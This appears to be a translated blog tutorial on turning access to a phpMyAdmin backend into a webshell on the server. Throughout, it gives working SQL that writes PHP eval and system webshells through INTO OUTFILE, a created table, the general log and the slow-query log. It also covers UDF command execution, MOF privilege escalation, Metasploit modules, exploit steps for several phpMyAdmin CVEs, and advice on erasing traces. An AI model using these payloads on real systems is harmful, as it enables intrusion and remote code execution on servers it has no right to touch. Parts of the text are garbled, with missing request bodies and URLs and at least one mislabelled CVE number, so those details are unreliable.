


phpmyadmin backend getshell and vulnerability exploitation

Cause of the Incident#

Previously, I wrote an article about brute-forcing weak passwords for the phpMyAdmin backend.

So, after gaining login access to the phpMyAdmin backend, how can we write a shell to the server for further operations?

Environment Configuration#

Most vulnerabilities in phpMyAdmin can only be exploited after authentication, so access to the backend is required.

Methods to access the backend can include:

  • Weak passwords: root/root, root/empty, mysql/mysql
  • Brute force: Refer to my previous article on phpMyAdmin brute-forcing
  • Directory disclosure

The environment uses phpstudy version 2018, which previously had vulnerabilities that have been fixed.


  • Apache/2.4.23
  • PHP/5.4.45
  • MySQL/5.5.53

Required Conditions#

Here, I will list all possible permissions that may be needed; not all writing methods require all permissions.

Absolute Path#

Physical path

select version();  -- Check database version
select @@datadir;  -- Check database storage path
show VARIABLES like '%char%';  -- Check system variables


You can also obtain it through the log variable:


phpinfo() page: Ideally, it directly displays the web path.

Use select load_file() to read files and find the web path:

You can try files like /etc/passwd, apache|nginx|httpd log, etc.

Configuration file disclosure: If the injection point has file read permissions, you can try to read the configuration files through load_file.

# Windows
 c:\windows\php.ini                             # php configuration file
 c:\windows\system32\inetsrv\MetaBase.xml       # IIS virtual host configuration file
  # Linux
 /etc/php.ini                                   # php configuration file
 /etc/httpd/conf/httpd.conf                     # Apache configuration file
 /usr/local/apache/conf/extra/httpd-vhosts.conf # Virtual directory configuration file

Single quote path disclosure: Directly add a single quote at the end of the URL. This requires that the single quote is not filtered (gpc=off) and the server returns error messages by default.'

Error parameter value path disclosure: Try changing the parameter value to an incorrect value.

Nginx file type error parsing path disclosure: Requires the Web server to be Nginx and have a file type parsing vulnerability.

Add /x.php after the image address; this image will not only be executed as a php file but may also disclose the physical path.

Google path disclosure: warning “fatal error”

Test file path disclosure:


phpMyAdmin/darkblueorange/ phpMyAdmin/index.php?lang[]=1

Check if the Account Has Read and Write Permissions#

If you encounter an error when writing the shell, you can also check the following user permissions:

select * from mysql.user;                // Query all user permissions
select * from mysql.user where user="root";        // Query root user permissions
update user set File_priv ='Y' where user = 'root';      // Allow root user to read and write files
update user set File_priv ='N' where user = 'root';      // Disallow root user to read and write files
flush privileges;                    // Refresh MySQL system privilege-related tables


Check if the Path Has Read and Write Permissions#

secure_file_priv Permission#

select @@secure_file_priv;   -- Query secure_file_priv
 -- secure_file_priv=NULL, prohibits import and export
 -- secure_file_priv='', no restrictions on import and export, default writable to /tmp directory in Linux
 -- secure_file_priv=/path/, can only import and export to the specified directory

Find secure_file_priv in my.ini, my.cnf, or mysqld.cnf files and set its value to "" or "/", then restart the MySQL service!

This is a general method; the mysql configuration file in phpstudy does not have this parameter.

So we can add a line secure_file_priv = to the configuration file.



Restart mysql and check again:


Log Read and Write Permissions#

Check the log status:

show variables  like  '%general%';


When general is enabled, all executed sql statements will appear in ***.log files.

Then, if you modify the value of general_log_file, the executed sql statements will generate a shell.

Enable log read and write:

SET GLOBAL general_log='on'


Other Permissions#

magic_quotes_gpc: When enabled, it escapes single quotes to become \ backslashes.


Regular Getshell#

The required conditions are:

  • The current database user has write permissions
  • Know the web absolute path
  • The web path is writable


select '<?php @eval($_POST[soap]);?>' into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\config.php';


Note that if you are executing the write in the phpmyadmin SQL statement, the path can only be a forward slash / or double backslashes \.

If you get an error message Can't create/write to file 'xxx/xxx/xxx.php' (Errcode: 13), it indicates that the directory is not writable. You can try other directories under the website, such as:

  • /upload
  • /templates
  • /cache

Writing a Chinese path shell:

set character_set_client='gbk';set character_set_connection='gbk';set character_set_database='gbk';set character_set_results='gbk';set character_set_server='gbk';select '<?php eval($_POST[soap]);?>' into outfile 'C:\\phpStudy\\WWW\\测试\\config.php';

Ant Sword connection:, password: soap



You can also use it like this:

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\test.php';

Access link: user



You can also use it in places with injection points like this:

id=1) into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\settings.php' fields terminated by '<?php @eval($_POST[]);?>'

Create Table Getshell#

You can also operate directly in phpmyadmin, or create a table directly with SQL statements:

CREATE TABLE `mysql`.`soapffz` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`soapffz` (`content` ) VALUES ('<?php @eval($_POST[soap]);?>');
SELECT `content` FROM `mysql`.`soapffz` INTO OUTFILE 'C:\\phpstudy\\PHPTutorial\\WWW\\test3.php';
Create TABLE soapffz (content text NOT NULL);
Insert INTO soapffz (content) VALUES('<?php @eval($_POST[pass]);?>');
select `content` from mysql.soapffz into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\test3.php';
Then delete the created table to erase traces
DROP TABLE IF EXISTS `mysql`.`soapffz`;


Connect to the shell.

Log Getshell#

Required conditions:

  • Log recording is enabled
  • Web absolute path

Actual operations performed:

  • Modify the log file to be a webshell.

Getshell by Writing to Log File#

Note that by:

show global variables like "%genera%";
set global general_log='on';

The operations set in the specified log directory will be invalid after restarting phpstudy.

Specify the log file:

set global general_log_file = "C:/phpstudy/PHPTutorial/WWW/test2.php";

Write execution code:

SELECT '<?php eval($_POST["soap"]);?>'

Write Shell via Slow Query#

Check the current slow query log directory:

show variables like '%slow%';


Reset the path:

set GLOBAL slow_query_log_file='C:/phpstudy/PHPTutorial/WWW/slow.php';

Enable slow query logging:

set GLOBAL slow_query_log=on;

Execute to write to the log:

select '<?php eval($_POST["soap"]);?>' from mysql.db where sleep(10);

User Defined Function (UDF)#

Applicable to Windows and Linux environments.

Required conditions:

  • Has write permissions
  • Plugin directory is writable (or can change the specified plugin directory).

Specific situations depend on the target MySQL version:

  • Mysql version > 5.1, the dll or so must be located in the mysql installation directory lib\plugin. When you have write permissions to that directory, you can utilize it. Check:
    show variables like %plugin%; // Check plugin directory
  • 5.0 <= Mysql version <5.1, needs to be exported to the target server's system directory, such as C://Windows/System32
  • Mysql version < 5.0, the directory can be customized. Specific utilization is as follows:

Write specific directory so or dll according to the target mysql version, you can refer to sqlmap:

select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin\lib_mysqludf_sys.dll';

Create the corresponding function:

create function sys_eval returns string soname "lib_mysqludf_sys.dll";

Execute command:

select * from mysql.func where name = 'sys_eval'; # Check the created sys_eval function
select sys_eval('whoami'); # Use system command

MOF Privilege Escalation#

Write a file to a MOF file through mysql, replacing the original MOF file, then the system will execute the uploaded MOF every five seconds.

Generally applicable to Windows <= 2003, and the C:\Windows\System32\mof directory has write permissions (which is generally not writable).

You can use MSF to exploit directly: exploit/windows/mysql/mysql_mof.

Special Version Getshell#

Affected versions: 3.5.x < and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
Exploitation module: exploit/multi/http/phpmyadminpregreplace
Affected version: phpMyAdmin v3.5.2.2
Exploitation module: exploit/multi/http/phpmyadmin3522_backdoor
Command execution exists in the phpMyAdmin configuration file /config/
Affected versions: 2.11.x < and 3.x <
Exploitation module: exploit/unix/webapp/phpmyadmin_config
Weak passwords & universal passwords
Weak password: version phpmyadmin2.11.9.2, directly login as root user without a password
Universal password: version 2.11.3 / 2.11.4, username 'localhost'@'@" will log in successfully

phpMyAdmin Vulnerability Exploitation#

WooYun-2016-1994 33: Arbitrary file reading vulnerability.

Affects phpMyAdmin 2.x versions, poc as follows:

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded Content-Length: 80

CVE-2014 -8959: Local file inclusion.

Affected range: phpMyAdmin 4.0.1--4.2.12, requires PHP version < 5.3.4, Poc as follows:

/../../../../phpinfo.txt%00    # Note to change the token value

In actual exploitation, you can write files to the /tmp directory in conjunction with this vulnerability to achieve RCE, the php version can be seen through the http header or by exporting table content to file.

CVE-2016-5734: Backend RCE.

Affected range: PhpMyAdmin 4.0.x-4.6.2, requires PHP 4.3.0-5.4.6 versions, exploitation as follows: -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

CVE-2018-1261: Backend file inclusion.

phpMyAdmin 4.8.0 and 4.8.1, verified to achieve arbitrary file inclusion. Exploitation as follows:

Execute SQL statement to write PHP code into Session file:

select '<?php phpinfo();exit;?>'

Include session file:*** # *** is the phpMyAdmin COOKIE value

CVE-2018-19968: Arbitrary file inclusion /RCE.

phpMyAdmin 4.8.0~4.8.3, exploitation as follows:

Create a database and write PHP code into Session file:

INSERT INTO SELECT '<?php phpinfo(); ?>';

Generate phpMyAdmin configuration table for the foo database, access:

Tamper with data inserted into pma column_info:

INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop','plop', 'plop', 'plop','../../../../../../../../tmp/sess_***','plop'; # *** is the phpMyAdmin COOKIE value

Here, note that the system's session save location is different; specific systems can be seen on the homepage after logging into phpMyAdmin.

MacOS: /var/tmp
Linux: /var/lib/php/sessions
phpStudy: /phpstudy/PHPTutorial/tmp/tmp

Access the address containing the Session file:[multi_edit][][]=baz&clause_is_unique=1

Reference articles:

Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.